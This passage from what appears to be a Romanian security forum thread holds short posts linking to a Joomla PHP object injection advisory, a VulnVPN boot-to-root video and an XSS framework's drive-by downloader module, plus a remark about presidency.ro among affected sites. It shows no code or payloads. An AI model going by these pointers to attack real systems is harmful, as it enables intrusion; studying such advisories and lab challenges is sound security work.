Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-03 Surs?: Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
  23. Kwelwild
    Description: This video demonstrates one approach to gaining root access to the 'boot to root' challenge known as VulnVPN VulnVPN (Vulnerable VPN) - Exploiting IKE Aggressive Mode PSK VulnHub - HackLAB VulnVPN Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: One Possible Way To Root Vulnvpn
  24. Kwelwild
    ?sta da pericol, m?car dac? era printre cele 60 de site-uri ?i presidency.ro
  25. Kwelwild
    Description: Executable Drive-by downloader module of Exploitation Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Owasp Xenotix Xss Exploit Framework V3: Executable Drive-By Downloader
×
×
  • Create New...